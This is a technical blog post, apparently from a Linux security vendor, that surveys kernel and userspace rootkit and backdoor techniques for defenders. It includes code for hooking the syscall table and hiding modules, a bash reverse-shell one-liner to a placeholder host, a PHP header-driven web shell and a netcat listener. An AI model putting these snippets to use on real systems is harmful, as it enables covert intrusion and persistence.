бекдоры на линукс (английский)



Предыдущая |

 

Introduction

When it comes to rootkits and other backdoors, everything is on the table. There exists a vulnerability that can be exploited in a system binary to gain root access? There’s a rootkit1 for that. You allow kernel modules? A plethora of nefarious goodies can be part of your system! Your new chip is made in a third-party factory? You get the idea.

In this post, we will focus on software backdoors commonly seen in Linux environments, we will attempt to outline some representative examples, and we will discuss common techniques backdoor authors use to hide their malicious payloads.

What’s a backdoor?

Most things that are or that can be made persistent in a system are candidates for rootkits and backdoors — options are only limited by the imagination and ingenuity of attackers. What’s worse, even in cases where no privilege escalation to root is involved (enabling a rootkit), backdoors are at least as privileged as the respective service, component, or user, which, most likely, is enough to cause you trouble. 

Once a backdoor has been installed, you can only hope someone notices, and given the multitude of means for attackers to get a foothold on your system (from build scripts and userspace applications to long-running utilities), it is hard to know where to look, or what to look for. After all, it only takes one malicious actor with the capability to install some malicious payload in some part of your system ;).  If such a foothold is established, attackers can now exfiltrate information, alter the normal operation of the system, bring services down, or take other undesirable actions. 

Although not as hard to detect as hardware backdoors, software backdoors and rootkits are a severe threat, used for state and corporate spying, information exfiltration, botnet command and control, or as stepping stones for reconnaissance and exploitation of other devices on the network.

The first rootkits date back to the early 1990s. These instances of backdoors simply replaced or modified files on the victim’s hard disk (e.g., replacing the UNIX login program with a malicious one). In the mid 90s, kernel rootkits appeared on Linux systems in the form of kernel modules, and, by the end of the decade, they existed for most UNIX-like operating systems like Solaris and FreeBSD, as well as for Windows

As rootkits evolved, attackers started devising more elaborate ways to modify in-memory contents of the running kernel or applications, as well as infecting the BIOS or device firmware, or using virtualization technology and hardware features to their advantage. Today, rootkits and other backdoors come in many forms and shapes. In this post, we will attempt to outline some representative examples of different types of backdoors, and discuss common techniques deployed in each case.

Species’ Samples

Overall, backdoors can be split into four large groups, depending on whether they exploit hardware or software vulnerabilities and also depending on whether they operate in kernel space or user space. In this post, we will focus only on software backdoors, and present some representative techniques for kernel and userspace backdoors, respectively. The outline of the rest of the post is the following:

Software / Kernelspace

Rootkits Abusing Loadable Kernel Modules (LKM)

This is the oldest and by far the most popular category of kernel rootkits seen in the wild. The first rootkits (ab)using kernel modules where described by Solar Designer, halflifeplaguez and others. The great benefit of LKM-based rootkits is that they are very powerful, allowing attackers to do (almost) anything in the system. Their biggest drawback is that they are neither backwards nor upwards compatible and are almost certain to break as kernel versions change. Moreover, bugs in the code are likely to have (very) noticeable side effects, even resulting in a system crash.

Usually a kernel rootkit’s primary goal is to maintain privileged access, which it can achieve through a number of means:

  • Altering system behavior (e.g., by hijacking system call tables or interrupt handlers)
  • Hiding itself
  • Hiding other files, directories and processes
  • Providing mechanisms for regaining privileges, which could be through:
    • Escalating privileges for given users or processes
    • Triggering keyloggers
    • Enabling remote connections

In the following section, we’ll examine some of the core techniques used by LKM-based rootkits.

Altering System Behavior

Hooking by Replacing System Calls

A rootkit can hook system calls by replacing pointers in the sys_call_table. However, to do so, it must first locate the system call table (from 2.6.x kernels and on, sys_call_table is not exported). There are various methods to achieve this, some of which are outlined below:

  • If kASLR is not enabled (which is rarely the case nowadays2), the address of the system  call table can be read directly from /boot/System.map via: grep sys_call_table /boot/System.map-$(uname -r) |awk '{print $1}'
  • If CONFIG_KALLSYMS=1 is set in the kernel config, it is trivial to fetch the address of the system call table by running addr = (void *)kallsyms_lookup_name("sys_call_table");
  • Depending on the kernel and architecture, the system call table can be fetched using the interrupt descriptor table and finding the system call interrupt gate. This technique was first proposed by sd & devik and is used by several rootkits. Let us examine how the suterusu rootkit uses this technique: 
    • For x86 the code is as follows:
1. unsigned char code[255];
2. asm("sidt %0":"=m" (idtr));
3. memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
4. sct_off = (idt.off2 << 16) | idt.off1;
5. memcpy(code, (void *)sct_off, sizeof(code));
6. p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);
7. if (p) { return *(unsigned long **)((char *)p + 3); }

Instruction at line 2 asks the processor for the interrupt descriptor table, whilst the following instruction gets a pointer to the interrupt descriptor of int 0x80. Line 4 computes the address of int 0x80 entrypoint. Now, the only thing left to look for is the location of  the call sys_call_table(,eax,4) opcode, near the beginning of the int 0x80 entrypoint. This is searched for by looking for the opcode "\xff\x14\x85" which corresponds to the pattern call <x>(, eax, 4). Line 7 returns the desired address.

  • For x86_64 and ARM, similar tricks are performed. For example, in x86_64 the technique is using  rdmsrl(MSR_LSTAR, <offset>); instead of asm("sidt %0":"=m" (idtr)); to fetch the system call table entry before searching for the appropriate call (this is not as trivial with kernels configured to have Retpoline protection for Spectre/Meltdown). 
  • Older rootkits found the system call table by abusing the fact that the sys_call_table was always between the end of the code section (init_mm.end_code) and the end of the data section (init_mm.end_data) of the current process. Since sys_close was exported by the kernel and because the system calls were ordered by their numbers, the address of the table could be found just by subtracting from the pointer of sys_close.

From the above, it is clear that determining the system call table address is not particularly hard given a LKM. Once the system call table address is found, one can replace system calls to their liking. Depending on to what extent the attacker is willing to go, one can overwrite the original address of a certain system call with one of their own, or, to be more subtle, overwrite code in the system call itself to point to their code. 

This is not as trivial in all cases (depending on kernel version and config), especially since recent kernels have enforced memory to be read-only on text pages, and given that SMP requires the changes to be synchronized across all cores. Thus, although implementations are very much architecture-specific, taking Intel x86 architectures as an example, the core gist of the technique used by most rootkits is the following: 

First, if the page for the system call table is read-only it has to be marked as RW:

unsigned int x;
pte_t *pte = lookup_address(sys_call_table, &x);if (pte->pte &~ _PAGE_RW)
	pte->pte |= _PAGE_RW;

Subsequently, the control bit within CR0 that write-protects memory also needs to be flipped:

unsigned long __cr0;
// per CPU code - make it preemption safe 
preempt_disable(); 
// read cr0 and flip the bit
__cr0 = read_cr0() & (~X86_CR0_WP);
// write back the new write-permission enabled bit
write_cr0(__cr0);
// replace the system call table entry
sys_call_table[__NR_system call_of_choice] = (void *)&system call_hook;
// replace the cr0 bit
__cr0 = read_cr0() | X86_CR0_WP;
write_cr0(__cr0);
// all done here
preempt_enable();

A modification like the above can be detected by comparing the addresses in the system call table against a copy made at a time the system was considered to be uninfected. If attackers employ more sophisticated rewriting techniques, detection must step-up and become more sophisticated itself.

In addition to replacing a system call, a kernel module can also register a new, previously non-existent system call. However, that is clearly less covert than the previous approach of leveraging existing system calls.

Hooking Using Kprobes

Kprobes are a fantastic tool for tracing things in the kernel, and for getting useful information about the execution. A user can set a kprobe on symbols, kernel addresses, functions, etc., and can get access to register and stack state. Essentially, if you register a kprobe, a custom piece of code executes in the probe handler context before execution resumes as usual. Kprobe handlers can execute before or after a function returns, and have access to different states. Clearly this is very powerful, as stated in the kprobe documentation:

“Since kprobes can probe into a running kernel code, it can change the register set, including instruction pointer. This operation requires maximum care, such as keeping the stack frame, recovering the execution path etc. Since it operates on a running kernel and needs deep knowledge of computer architecture and concurrent computing, you can easily shoot your foot.”

As expected, kprobes, as well as the now-deprecated jprobes (another type of tracing mechanism), have been used in rootkits to achieve stealthiness. For instance,  by registering a kprobe handler on file related syscalls, it’s easy to implement file hiding behavior as part of your rootkit.

Module Hiding Techniques

There are a multitude of techniques which modules employ to hide themselves from the system, as well as to hide other malicious files, directories, or processes.

Hiding by (ab)using debug registers

A technique that has been actively used in the wild to hide rootkits is taking advantage of a  debugging mechanism present in x86. A great overview of this technique is presented by halfdead. Debug registers allow users to set hardware breakpoints. As soon as execution flow hits an address marked with a breakpoint, it hands the control to the debug interrupt handler, which then calls the do_debug() function. 

Consider a scenario where you set a breakpoint on the address of the system call table, and then hijack the debug interrupt handler (INT 1) to call your own method, or replace the do_debug method, and thus leave the Interrupt Descriptor Table (IDT) intact. This is very powerful and stealthy, as system calls, for instance, can be controlled by an attacker, and, if done cleverly, this technique can work without touching the system call table, system call table handler, or the INT 80 handler. Further, if  someone tries to detect INT 1 handler modification or place their own handler there (like a debugger would), the attacker can set a secondary breakpoint to watch its own handler’s address. 

Hiding by list manipulation and call hooks

One common way to hide the module from listing /proc/modules and lsmod is by simply removing it from the kernel module list structure (which does not remove it from memory).

An example of such manipulation is listed in the following snippet, taking from this sample rootkit:

// entry before the module in the kernel modules list - store so that we can restore things later
mod_list = THIS_MODULE->list.prev;
// delete this module
list_del(&THIS_MODULE->list);
kfree(THIS_MODULE->sect_attrs);
THIS_MODULE->sect_attrs = NULL;// hide from /sys/module
kobject_del(&THIS_MODULE->mkobj.kobj);
list_del(&THIS_MODULE->mkobj.kobj.entry);

Similar tricks are used to hide binaries from commands like ps, or ls. For instance, if one hooks the getdents system call, they can replace it with their own that monitors for commands trying to list an executable, thereby hiding any malicious activity. One such example is presented in this rootkit.

Rootkits Directly Modifying Kernel Memory

Non-LKM kernel patching was proposed by Silvio Cesare in his Runtime Kernel Patching paper, which proposed (ab)using direct access to memory in Linux, made available through the /dev/mem and /dev/kmem device files. Modern Linux distributions disable this access by default. However, in case CONFIG_STRICT_DEVMEM or CONFIG_DEVKMEM are not properly set in your kernel config, the entirety of the LKM-based functionality can be achieved without LKMs if a user has root access (see for instance this phrack article from 2001 on system call patching). We will not elaborate further in this category due to the overlap with the LKM techniques.

Rootkits Abusing eBPF

This is an interesting and less-explored category that builds on the same principles as the previous ones: if a malicious actor gets privileges on a modern, eBPF-enabled Linux system, they can use tracing capabilities to see everything within the system, as well as write to userspace memory. As a notable example of such a type of rootkit, glibcpwn injects shared libraries into systemd, using bcc-based eBPF kprobes. In particular, the rootkit’s functionality is summarized by the following points:

  • Hooking the timerfd_settime system call, which is called by systemd every minute is hooked
  • Computing an offset to the start of libc by tracking appropriate structs from the arguments passed
  • Returning the stack return address and address of __libc_start_main is to the userland tracer code, and starting a ROP chain

Similar to kernel modules that hide themselves, once an eBPF is attached to a kprobe, it can prevent processes from interacting with the kernel, listing eBPF programs, or listing kernel modules. However, contrary to kernel modules, eBPF filters need to be tied to a running process to stay alive. That said, if that process is init, the rootkit can stay alive as long as the system is running.

Software / Userspace

Contrary to kernel-level rootkits, userspace backdoors usually don’t have absolute powers, but they are easier to write and carry less risk -- they won’t result in the operating system crashing given possible mistakes or version incompatibilities.

Rootkits Replacing Common Utilities

The oldest category of userspace rootkits is those which replace common utilities. Usually, a binary that is running with root privileges is replaced or modified in the running system. Such rootkits can easily be detected by file integrity checking tools and signature-based solutions. Popular tools to scan a system for infections of this sort are chkrootkit and Rootkit Hunter, which check for known signatures/modifications performed by rootkits. For instance, chkrootkit performs a series of tests in the local system for hidden files or modifications performed by their tracked list of rootkits, and lists open connections involving port numbers known to be used by malware. 

Rootkits Abusing ELF Metadata

A thorough demonstration of a metadata-based backdoor is presented by Shapiro et al.: Using Cobbler, the authors demonstrated that it is possible to compile arbitrary payloads into an ELF’s executable metadata, which are then “executed” by the run-time loader (RTLD). To provide a PoC of a backdoor using this technique, they inject a metadata-based backdoor into the ping binary of Ubuntu’s inetutils v1.8. Normally ping runs setuid as root and drops its root privileges early on, also accepting an optional --type argument to customize the type of packets sent. If that argument is provided, ping tests the arguments like so:

if(strcasecmp(, "echo") == 0) {...}

The rootkit overrides the call to setuid() with getuid() (to not produce noticeable side-effects), and overrides the call to strcasecmp() with execl(). This  results in ping not dropping privileges and treating the argument to --type as a path to an executable to be executed. If the flag is not passed, the binary performs its regular functionality.

The key parts behind this implementation are as follows:

  • The compiler building ping does not know where setuid() and strcasecmp() will live at runtime and thus creates entries in the executable’s Global Offset Table (GOT) to be lazily filled by the dynamic linker. However, if an entry in the GOT table is not empty, the address provided will be considered as the location of the respective function in memory.
  • The rootkit crafts metadata to lookup the base address of libc then calculate the offsets of getuid() and execl(), and finally patches the GOT of ping to point to them before the binary is executed. The important part here is that this can be achieved by merely using nine relocation entries and one symbol entry, without making any changes to the executable segments of the binary.

Module Backdoors

When was the last time you checked the integrity of your Apache or PHP modules?  Module-supporting software is a good target for backdoors as they can go undetected from almost all antivirus or network-based IDS systems (since, if written properly, a backdoor on the web server that results in traffic appears as, well, web server traffic). Another appealing aspect to modules is that, in most cases, they are platform independent and can easily be ported to different OSes and versions (e.g., as is the case with PHP). In this section, we present three examples of backdoors using modules, one for PHP and two for the Apache server:

  • PHP-Backdoor registers a PHP extension that hooks operations like hash and sha1 and subsequently logs the inputs to these functions (which are primarily passwords). This is a toy-example, but it is indicative of how different points in the system can be compromised by attackers to exfiltrate information.
  • mod_authg is an Apache module that simply registers a hook handler that fetches contents through Apache’s portable runtime, essentially allowing leakage of system info. For instance, once the module is loaded, one may invoke it by passing /authg?c=id to the target URL and get a reply like the following:
HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 16:33:30 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/htmluid=33(www-data) gid=33(www-data) groups=33(www-data)
  • mod_rootme is an Apache backdoor that can spawn a root shell. If configured properly, Apache is not running as root, but the module enables root access by abusing a pre-fork hook while the Apache process still has root permissions.

Although the above backdoors are stripped-down from their full capability potential, they are indicative of the fact that there are many different points where a system can be compromised. One may argue that such backdoors are often easily detectable through configuration files. However, more advanced hiding techniques can be deployed by attackers, such as hiding malicious payloads within existing modules, or by modifying the appropriate objects. 

For instance, Bußmeyer et al. demonstrate how to attack class-one smart card reader implementations, using a Javascript-based rootkit PoC which works as follows: first they hook appropriate Javascript functions in Firefox’s js3250.dll, then modify the Javascript loaded on window.onload so that every page viewed in an SSL secure banking context includes malicious remote Javascript which performs manipulated transactions that are hidden from the user.

Runtime Backdoors

Instead of modifying a PHP or Nodejs module, why not use the execution environment to your benefit? Runtime backdoors reflect a technique which has been used in the wild when hosts or websites are malicious. For instance, in Rootkits for Javascript Environments, Adida et al. demonstrate how it is possible to alter the Javascript environment in a webpage to steal user passwords when login bookmarklets are involved. Bookmarklets (also known as favelets or Javascript bookmarks) allow users to click on an element in their bookmark bar, and run Javascript in the context of the current web page. 

The bookmarklet feature has been used by common password managers and ads to auto-complete user info in various website forms. However, bookmarklets know nothing about the web page until their code actually executes, and their execution is opportunistic. In the benign scenario, the bookmarklet interacts with the native Javascript environment directly (Figure 1 - left). However, given a malicious webpage, the bookmarklet can be manipulated by interacting with the attacker’s Javascript objects instead (Figure 1 - right).


Figure 1 [src]

This allows, for instance, attackers to steal user passwords if they trick the bookmarklet into using the wrong password for a page.

Script & Config Backdoors

Reverse shells and other types of backdoors can also be implemented as simple scripts that are running in the system. Several such examples exist in open-source repositories and forums, ranging from simple one-liners such as bash -i >& /dev/tcp/<ip>/<port> 0>&1 to full-fledged scripts or binaries. Likewise, a backdoor could be part of untrusted code that is running on the host. For instance, a PHP website with the following code present in its codebase is vulnerable to remote command execution, in which the HTTP header of the request can be used to send commands to the server:

<?php
   if (isset($_SERVER['HTTP_CMD'])) {
       echo "<pre>" . shell_exec($_SERVER['HTTP_CMD']) . "</pre>";
   }
?>

Similarly, one can span loggers of various sorts (e.g., nc -vlp 80 (using netcat to log incoming traffic to port 80). Attackers may also achieve persistence by modifying appropriate configuration files or scheduled tasks, such as by updating .bashrc entries to invoke other binaries instead of system utilities, replacing common commands using aliases, or modifying cronjob tasks, which are used to schedule user tasks on a periodic basis. For example, known malware have been “disguising” shell scripts as PNG files, which attempted to replace different users’ cron schedules with contents from freshly-downloaded files, which subsequently start more weird creatures like cryptocurrency miners.

The above examples are just samples of the different possibilities open to attackers, and similar patterns can be applied to all public-facing code: regardless of the programming language used, backdoors can be inserted at every point, from the code itself, to the compiler toolchain, to the continuous integration and shipping stages. As stated in the classic Turing Award lecture “Reflections on Trusting Trust”: “To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.” (or for that matter, trust that you are in good hands for your runtime protection ;))

Ptrace and inotify Hooks

Being in userland doesn’t mean that you can’t be stealthy. Several backdoors use ptrace to attach to a process and change its arguments by setting a breakpoint on main(). Similarly, one can use ptrace on attach and clone calls, executing a malicious payload in a new thread inside a host binary. Such techniques, as well as using inotify handlers to place read watches on directories that are critical to the detection of the backdoor, have been known to be popular in the wild. 

Inotify is a Linux mechanism for monitoring filesystem events. One can register filesystem change callbacks that trigger if certain directories or files are accessed. Once backdoors detect that someone is about to mess with their files, they can unlink them from their original location, wait for the file/directory traversal to end, then restore things as if nothing ever happened -- kind of like a magic trick.

Conclusion

In this post, we outlined common techniques used by attackers to gain persistence in an execution environment. Although several of these techniques can be thwarted by modern runtime checkers and malware analysis frameworks, a recurring theme emerges: functionality that involves state and dynamic loading or unloading of code can be used both for good and evil, and the pool for new attack vectors is endless. 

Thus, it is critical not only to analyze software for such vulnerabilities, but to also built robust dynamic detection and prevention frameworks that do not only rely on known exploitation patterns, but can provide runtime assurances that user-defined security properties are not violated. Our goal at Capsule8 is provide the protection and visibility needed to ensure Linux production systems aren’t pwned, without slowing down performance or inadvertently creating new backdoor opportunities (we don’t use a kernel module for, well, all the above reasons). 

 

 

 

1 Originally, the term rootkit was coined to denote a collection of tools that enabled administrator-level access to a computer or network” (think utilities like sed and ps). Today the term is almost exclusively referring to malware. In this post, we will use the term rootkit to denote any malicious program that achieves persistence, whether in kernel-space or userspace. Return^

2 You may check the settings in your system by examining the CONFIG_RANDOMIZE_BASE and CONFIG_RANDOMIZE_MEMORY in your kernel configReturn^